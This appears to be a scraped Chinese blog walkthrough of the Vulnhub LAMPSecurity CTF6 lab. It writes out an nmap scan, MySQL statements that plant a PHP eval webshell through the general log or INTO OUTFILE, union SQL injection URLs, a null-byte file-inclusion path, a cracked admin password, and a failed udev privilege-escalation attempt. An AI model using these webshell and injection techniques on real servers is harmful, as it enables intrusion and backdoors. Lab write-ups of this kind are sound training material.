LAMPSecurity: CTF6 Vulnhub Walkthrough
镜像下载地址:
https://www.vulnhub.com/entry/lampsecurity-ctf6,85/
主机扫描:
╰─ nmap -p- -sV -oA scan 10.10.202.130
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-21 08:57 CST
Nmap scan report for 10.10.202.130
Host is up (0.0029s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((CentOS))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Dovecot imapd
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
624/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
3306/tcp open mysql MySQL 5.0.45
MAC Address: 00:0C:29:62:3B:5A (VMware)
目录扫描
phpinfo 获取物理路径:/var/www/html
网站备份寻找敏感信息
phpmyadmin 登录试试
phpadmin 写shell
这里简单下复习下PHPadmin 拿shell的几种思路:
1)志文件写入一句话来获取webshell
general.log变量是指是否启动记录日志;而general log file指的是日志文件的路径,可以看到general.log变量的状态为OFF,故我们要修改为ON;general log file变量中的*.log的后缀我们改为*php。拿完webshell记得要改回去哟。SQL语句进行修改
show global variables like "%log%"
set global general_log = "ON";
SET global general_log_file='/var/www/html/shell.php'
select "<?php eval($_POST['cmd']);?>"
2)利用插入一句话来提取webshell
show global variables like '%secure%';显示是NULL值,这样的情况下我们插入一句话是无法插入的,需要我们修改secure_file_priv=''为空值才能插入一句话:
解释一下:
secure_file_priv为null 表示不允许导入导出;
secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹;
secure_file_priv没有设置时,则表示没有任何限制
select "<?php eval($_POST['cmd']);?>" into outfile '/var/www/html/hack.php'
这里日志文件没有开启,第一种方式无失效,第二种方式,标识没有限制,可以尝试写webshell
报错,目录没权限,尝试/tmp 目录写入没有问题的,放弃。尝试其他办法
主页面发现SQL注入漏洞:
http://10.10.202.130/index.php?id=4 and true #true
http://10.10.202.130/index.php?id=4 and false # false
http://10.10.202.130/index.php?id=4 order by 7 #true
http://10.10.202.130/index.php?id=4 order by 8 #false
10.10.202.130/index.php?id=4 union select 1,2,3,4,5,6,7 from user
http://10.10.202.130/?id=4 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6,7
SQLmap 获取admin的密码
admin | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass)
http://10.10.202.130/index.php?action=login
登录没发现长传点之类的接口
继续看看源代码
login.php 发现文件包含漏洞
这里后缀为.tpl,这里尝试使用截断%00或者%0A
http://10.10.202.130/actions/login.php?action=../../conf/config.ini%00
尝试把一句话木马,这里有两个思路:
1. 通过phpamdin 写到tmp目录,进行文件包含../../../../../../tmp/hack.php%00
2. 写到日志文件,进行包含进来../../logs/log.log%00 看看能否解析
<?php eval($_POST['cmd']);?>
http://10.10.202.130/actions/login.php?action=../../logs/log.log%00
提权操作
尝试内核提权,几个都不行
最后通过Google得知内核Kernel version is 2.6.18-92.el5 需要UDEV提权
cp /usr/share/exploitdb/exploits/linux/local/8478.sh ./
sed -i -e 's/\r$//' 8478.sh
无法成功,尝试了多次,依旧,有可能跟环境有关系吧!
LAMPSecurity: CTF6 Vulnhub Walkthrough的更多相关文章
- HA Joker Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-joker,379/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.132Starti ...
- HA: ISRO Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-isro,376/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.131Startin ...
- Hacker Fest: 2019 Vulnhub Walkthrough
靶机地址: https://www.vulnhub.com/entry/hacker-fest-2019,378/ 主机扫描: FTP尝试匿名登录 应该是WordPress的站点 进行目录扫描: py ...
- DC8: Vulnhub Walkthrough
镜像下载链接: https://www.vulnhub.com/entry/dc-8,367/#download 主机扫描: http://10.10.202.131/?nid=2%27 http:/ ...
- HA: Infinity Stones Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-infinity-stones,366/ 主机扫描: 目录枚举 我们按照密码规则生成字典:gam,%%@@2012 cru ...
- Sunset: Nightfall Vulnhub Walkthrough
靶机链接: https://www.vulnhub.com/entry/sunset-nightfall,355/ 主机扫描: ╰─ nmap -p- -A 10.10.202.162Starting ...
- Dc:7 Vulnhub Walkthrough
靶机下载地址: https://www.vulnhub.com/entry/dc-7,356/ 主机扫描: http://10.10.202.161/ Google搜索下: SSH 登录 以上分析得出 ...
- AI: Web: 2 Vulnhub Walkthrough
靶机下载链接: https://www.vulnhub.com/entry/ai-web-2,357 主机端口扫描: 尝试SQL注入,未发现有注入漏洞,就注册创建于一账户 http://10.10.2 ...
- AI: Web: 1 Vulnhub Walkthrough
下载链接: https://www.vulnhub.com/entry/ai-web-1,353/ 主机发现扫描: 主机端口扫描 http://10.10.202.158/ 目录扫描: ╰─ sudo ...
随机推荐
- 用CodePush在React Native App中做热更新
最近在学React Native,学到了CodePush热更新. 老师讲了两种实现的方法,现将其记录一下. 相比较原生开发,使用React Native开发App不仅能节约开发成本,还能做原生开发不能 ...
- LinkedList实现原理(JDK1.8)
LinkedList实现原理(JDK1.8) LinkedList底层采用双向链表,如果对链表这种结构比较熟悉的话,那LinkedList的实现原理看明白就相当容易. 链表通过"指针&quo ...
- easywechat微信开发SDK之小微商户进件(一)
微信本身不提供小微商户进件的SDK,偶然发现easywechat这么个东西,官网地址是https://www.easywechat.com/ 整合了微信开发中常用的接口,包括微信公众号相关接口,微信 ...
- Idea创建maven项目,报错xxx already exists in VFS
1.问题描述: 我打算在父级maven项目中创建子级project,但是一直报错如下: 2.stackover flow中找到了问题的答案, 地址:https://stackoverflow.com/ ...
- 【数据结构】之散列链表(Java语言描述)
散列链表,在JDK中的API实现是 HashMap 类. 为什么HashMap被称为“散列链表”?这与HashMap的内部存储结构有关.下面将根据源码进行分析. 首先要说的是,HashMap中维护着的 ...
- 用 python 分析基金!让赚钱赢在起跑线!
你不理财,财不理你!python 也能帮你理财? 效果预览 累计收益率走势图 基本信息结果 如何使用: python3 + 一些第三方库 import requests import pandas i ...
- git的用法 回到某个版本
进入到项目文件夹 如果新建项目时没有勾选git 进入到项目中
- hybrid app初体验,和react-native一起飞
第一次启动了react-native的示例,今天主要把其中遇到的坑与解决的办法分享给大家.如有疏漏.错误还望指正. 首先还是要从hybrid app这个概念说起(如果对于这个过程不感兴趣的同学,可以直 ...
- js4——字符转化
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" ...
- Frida用法之函数操作
Frida接口功能介绍 Frida是个so级别的hook框架,它可以帮助开发.安全人员对指定的进程的so模块进行分析.它主要提供了功能简单的Python接口和功能丰富的JS接口,使得hook函数和 ...